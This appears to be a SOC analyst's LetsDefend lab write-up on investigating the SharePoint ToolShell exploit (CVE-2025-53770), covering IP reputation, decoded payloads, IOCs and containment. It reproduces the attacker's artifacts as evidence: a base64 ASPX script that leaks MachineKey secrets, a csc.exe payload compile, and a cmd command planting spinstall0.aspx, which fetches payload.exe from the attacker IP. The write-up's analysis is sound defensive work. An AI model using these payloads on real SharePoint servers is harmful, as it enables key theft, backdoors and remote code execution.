来源

关联漏洞

介绍

# LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell

## Introduction

I went into a SharePoint zero-day called ToolShell (CVE-2025-53770) in the LetsDefend lab. I mimicked a real-world zero-day attack where a malicious POST request bypassed auth, ran PowerShell to steal MachineKeySection keys, compiled payload.exe, and dropped a web shell (spinstall0.aspx). I logged everything, analyzed behavior, and contained the host. This README covers the attack processes, the steps to abate the attack, and lessons learnt.

## Lab Overview

- Platform: LetsDefend Cyber Range
- Target: SharePoint Server (SharePoint01)
- CVE: CVE-2025-53770
- Objective: Analyze RCE, practice detection, and containment

## Tools Used:

- Windows PowerShell
- VirusTotal
- AbuseIPDB
- LetsDefend Log Management
- LetsDefend Enpoint Security
- Base64 Decoder
- LetsDefend Threat Intel

## The Alert
<img width="980" height="396" alt="image" src="https://github.com/user-attachments/assets/4ef826f1-2729-4e70-b93e-4b680453a328" />

This is a critical alert and suspicious activity that targeted MS Sharepoint´s ToolPane.aspx with with large payload and spoofed Referer. The CVE context is linked to CVE-2025-53770. It is  a critical vulnerability SharePoint exploit via a specially crafted POST request that allowed unauthenticated attackers. The successful exploitation led to remote code execution (RCE) on the server. I Treated this as active, high-urgency and assume possible successful compromise until proven otherwise. 

## A Brief Meaning SharePoint

Microsoft SharePoint is a platform for enterprise collaboration and document management — essentially a secure, organized hub for files, workflows, and internal web apps.

## Core Uses

- Document Management: Version control, audit trails, and file permissions

- Collaboration: Multiple users can co-edit and share documents

- Intranet / Portals: Internal news, HR policies, dashboards

- Workflows & Automation: Forms, approvals, and notifications

- Integration: Connects with Teams, Outlook, Office apps, and Power BI

## Sharepoint Security Considerations

- Uses Active Directory or SSO for authentication

- Data encrypted at rest and in transit

- Web parts and layouts may be abused if misconfigured

- Regular patching is critical to defend against zero-day exploits

## What is CVE-2025-53770 (ToolShell)
A critical zero-day in Microsoft SharePoint Server that lets attackers run code remotely without authentication. It abuses insecure deserialization and often chains with other SharePoint flaws (CVE-2025-49704, CVE-2025-49706) for full system takeover. Rated CVSS 9.8 (Critical) and actively exploited in the wild.

## Attack Analysis with VirusTotal
I analyzed the IP address of the sender( Sourse IP Address) with VirusTotal
Source IP Address : 107.191.58.76
<img width="903" height="461" alt="image" src="https://github.com/user-attachments/assets/0de7ece4-f15e-45ee-a09e-85cf10e9a858" />


From this i can see that 15/95 security vendors flagged this IP address as malicious which already says alot about the IP.

## IP Location

Now i have to search the location the IP This was done the help of AbuseIPDB and as shown below, the IP Known for hacking, brute-force, web app attack, port scan, DNS poisoning.


<img width="682" height="634" alt="image" src="https://github.com/user-attachments/assets/fd467e0f-b8f4-4f3e-aa10-b17cf6339466" />

# Endpoint Analysis

As a Soc Analyst solving this, one of the important step to take is the endpoint analzsis. I searched for the host on the endpoint security with the name 'SharePoint01' and since the IP is known for hacking for further analysis.

<img width="1523" height="752" alt="image" src="https://github.com/user-attachments/assets/601d0a0a-0348-4cc1-a18b-5700f1d6f804" />

after locating the host, i visited the terminal history to check the command line

<img width="801" height="334" alt="image" src="https://github.com/user-attachments/assets/c30383e6-1f3a-451d-bd32-4d804bbd9c47" />

## | Terminal History Command line   

PCVAIEltcG9ydCBOYW1lc3BhY2U9IlN5c3RlbS5EaWFnbm9zdGljcyIgJT4NCjwlQCBJbXBvcnQgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iICU+DQo8c2NyaXB0IHJ1bmF0PSJzZXJ2ZXIiIGxhbmd1YWdlPSJjIyIgQ09ERVBBR0U9IjY1MDAxIj4NCiAgICBwdWJsaWMgdm9pZCBQYWdlX2xvYWQoKQ0KICAgIHsNCgkJdmFyIHN5ID0gU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkuTG9hZCgiU3lzdGVtLldlYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EiKTsNCiAgICAgICAgdmFyIG1rdCA9IHN5LkdldFR5cGUoIlN5c3RlbS5XZWIuQ29uZmlndXJhdGlvbi5NYWNoaW5lS2V5U2VjdGlvbiIpOw0KICAgICAgICB2YXIgZ2FjID0gbWt0LkdldE1ldGhvZCgiR2V0QXBwbGljYXRpb25Db25maWciLCBTeXN0ZW0uUmVmbGVjdGlvbi5CaW5kaW5nRmxhZ3MuU3RhdGljIHwgU3lzdGVtLlJlZmxlY3Rpb24uQmluZGluZ0ZsYWdzLk5vblB1YmxpYyk7DQogICAgICAgIHZhciBjZyA9IChTeXN0ZW0uV2ViLkNvbmZpZ3VyYXRpb24uTWFjaGluZUtleVNlY3Rpb24pZ2FjLkludm9rZShudWxsLCBuZXcgb2JqZWN0WzBdKTsNCiAgICAgICAgUmVzcG9uc2UuV3JpdGUoY2cuVmFsaWRhdGlvbktleSsifCIrY2cuVmFsaWRhdGlvbisifCIrY2cuRGVjcnlwdGlvbktleSsifCIrY2cuRGVjcnlwdGlvbisifCIrY2cuQ29tcGF0aWJpbGl0eU1vZGUpOw0KICAgIH0NCjwvc2NyaXB0Pg==                             

## PowerShell flags: -nop -w hidden -e
- -nop = No profile (avoid profile scripts).
- -w hidden = start window hidden (stealth).
- -e <base64> = encoded command

## Command Line Findings with Base64 Decoder:

Due to the Payload, I proceeded to Base64 decoder to decode the command as shown below

<img width="807" height="656" alt="image" src="https://github.com/user-attachments/assets/1816ed88-62fc-413b-b0b7-524c312e1e78" />

The user launched powershell from the system directory “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” and with encoded commands ASP.NET server-side C# script.
-	Uses reflection to load the System.Web assembly,
-	 Accesses the non-public MachineKeySection and calls a non-public method (GetApplicationConfig),
-	Reads the web application’s MachineKey values (ValidationKey, DecryptionKey, etc.),
-	Writes those keys to the HTTP response (i.e., exfiltrates them).

## Capturing Payloads and Post Exploitation Activities: / _layouts/15/ToolPane.aspx?... 

The payload tries to read and leak the ASP.NET MachineKey for the host a secret that can be used to forge ViewState/deserialization tokens and enable auth bypass and remote code execution. This matches the ToolShell exploitation pattern (MachineKey abuse.
Key Indicators of Compromise (IoCs) in the command with the use of Base64 Decode and Encode. 

- The POST + large payload + this encoded command indicates the attacker likely attempted to create or execute such a server-side script via the ToolShell exploit path.
- Machine Explosure and alert was triggered: The use of -encodedCommand + hidden window + base64 payload indicates evasion and automated exploitation. Attackers frequently use -encodedCommand to hide payloads and avoid detection/commandline logging patterns lets an attacker create malicious View State or serialized payloads that the application will accept as valid enabling authentication bypass and remote code execution on vulnerable SharePoint instances. For ToolShell (CVE-2025-53770), this is exactly the exploitation chain.


## CMD Execution & Exploitation

The attacker tried to access private configuration and aims to exploit therefore, abusing .NET. From Base64 decoder we can see System.Web.Configuration.MachineKeySection and GetApplicationConfig: MachineKeySection contains:
- The machine/app’s ValidationKey
- The machine/app’s DecryptionKey.

These keys are secrets used for protecting viewstate and forms authentication. Retrieving them is a direct attempt to obtain material that allows forging/validating serialized ASP.NET payloads → direct precondition for deserialization-based RCE.

## CMD COMMANDS FINDING:

Just THREE seconds after as shown above, the attacker sent another command 

<img width="867" height="228" alt="image" src="https://github.com/user-attachments/assets/fa062dcf-3afc-4818-af88-f2d04be72bba" />

## | Terminal History Command line   

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs.

## Findings 

- The commands shows a C# compiler (csc.exe) that ships with .NET framework. Its job is to take source code (.cs files) and compile into .NET assembly usually .exe or .dll.
- The attacker uploaded or created a C# source file (payload.cs) on the victim host, then used the built-in .NET compiler (csc.exe) to compile it into a Windows executable (payload.exe) This payload could be a malware.

## ANOTHER CMD COMMANDS FINDING:

Just TWO seconds after as shown above, the attacker sent another command 

<img width="892" height="344" alt="image" src="https://github.com/user-attachments/assets/16759736-fa70-47fc-9589-6edc3df6e2de" />

## | Terminal History Command line
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs."C:\Windows\System32\cmd.exe" /c echo <form runat=\"server\"> <object classid=\"clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11\"><param name=\"Command\" value=\"Redirect\"> <param name=\"Button\" value=\"Test\"> <param name=\"Url\" value=\"http://107.191.58.76/payload.exe\"></object></form> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx.

## Findings
-	The attacker used cmd.exe to create a new ASPX file (spinstall0.aspx) inside SharePoint's LAYOUTS directory by echoing an HTML form/object into that path.
-	The injected ASPX contains an <object> with a Url="http://107.191.58.76/payload.exe", directing the server or a visitor to that remote payload.
-	Placing the file under ...\TEMPLATE\LAYOUTS\ makes it available via the SharePoint web application (a persistent web-accessible backdoor/dropper).
-	This indicates attempted remote delivery/execution of payload.exe from the attacker-controlled host (107.191.58.76) and is a clear sign of compromise and persistence threat.

## ANOTHER CMD COMMANDS FINDING:

Just FIVE  seconds after as shown above, the attacker sent another command 

<img width="893" height="328" alt="image" src="https://github.com/user-attachments/assets/29ddde52-ce41-40cb-91b8-755962796d35" />

## | Terminal History Command line
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command"[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"

## Findings
-	Executed PowerShell again to call System.Web.Configuration.MachineKeySection.GetApplicationConfig(), which reads the application's MachineKey configuration.
-	That retrieves the ValidationKey/DecryptionKey used to sign/encrypt ViewState and auth tokens material an attacker can use to forge serialized payloads and bypass authentication.
-	This is a clear consistent reconnaissance/exfiltration step in a ToolShell-style exploit chain (preparation for RCE) that was mannually invoked.


This activites shows a consistent pattern and will  treat it as high-confidence, compromised and collected forensic artifacts immediately.

## Threat Intel

After gathering all the commands and findings, I made further research to the threat intel and searched by data type IP. The Data source shows OnlyHunt and TAG CVE-2025-53770 and with Referer: /_layouts/SignOut.aspx for the alerts investigation channel shows that it’s a legitimate sharepoint that was spoofed or used and later sign out from sharepoint to make it appear like it originated from a normal sharepoint action. 
At the point, I conatined the host.

<img width="954" height="564" alt="image" src="https://github.com/user-attachments/assets/d87d552c-f0d7-4983-8147-4aabcb9346ec" />

## IOC ( Artifacts)

- IP 107.191.58.76: Attacker source IP observed sending exploit POST
- /_layouts/15/ToolPane.aspx?DisplayMode=Edit: Type "url". Exploit endpoint targeted by POST
- Spinstall0.aspx: Type "filename". Deployed malicious ASPX backdoor filename
- MachineKeySection: Type "string". ASPX code string indicating MAchineKey exfiltration

# My Analysis Note and summary

## Analyst Note — SOC342 (CVE-2025-53770 / ToolShell) — SharePoint01
Date/Time:2025-07-2213:07(event)
Analyst:[YourName]
CaseID:SOC342
Host:SharePoint01
Severity: Critical

## SUMMARY

I spotted a critical attack zero-day vulnerability exploitation attempt at 2025-07-22 13:07 called ToolShell (CVE-2025-53770) in an on-premises SharePoint Server with host name SharePoint01. The attacker, from a known malicious IP (107.191.58.76) which is the source of POST and payload host, bypassing authentication to run remote code on the server.
the attacker uploaded/created spinstall0.aspx in the SharePoint LAYOUTS directory and executed PowerShell to read ASP.NET MachineKey material and to compile a C# payload via csc.exe. Therefore, allowing them to craft trusted payloads.
This activity is consistent with web-shell deployment with spinstall0.aspx in sharepoint, MachineKey exfiltration, and on-host payload compilation all high-confidence indicators of compromise.

## UPDATING MY PLAYBOOK ANALYST NOTE

<img width="758" height="479" alt="image" src="https://github.com/user-attachments/assets/a6f54a9c-66c0-400c-9d8b-895fee714bca" />

<img width="1381" height="292" alt="image" src="https://github.com/user-attachments/assets/69245d07-d3dc-496b-8906-e928b06179a7" />

## RECOMMENDED STEPS TO BE TAKEN TO ABATE THE ATHACKER ACTIVITIES:

After discovering the compromise, I recommended in the Analyst Note that the following steps be taken 
1.	Contain: If authorized, isolate SharePoint01 from network; if not, maintain outbound egress restrictions and block attacker IPs/clusters.
2.	Hunt: Search all SharePoint and ensure adequate backups
3.	Eradicate: Remove confirmed malicious files and any unauthorized scheduled tasks/services; inspect for additional persistence.
4.	Mitigate: Rotate ASP.NET/MachineKey values and apply Microsoft July 2025 emergency patches to all on-prem SharePoint instances. Coordinate rotation with application owners.
5.	Detect & Prevent: Deploy/add detection rules and hunt across environment for similar activity. 

文件快照

 [4.0K]  /data/pocs/bfc7ba4b9942e5e9b69b3cb388266188cd220deb
├── [ 723]  DISCLAIMER.md
└── [ 14K]  README.md

0 directories, 2 files

备注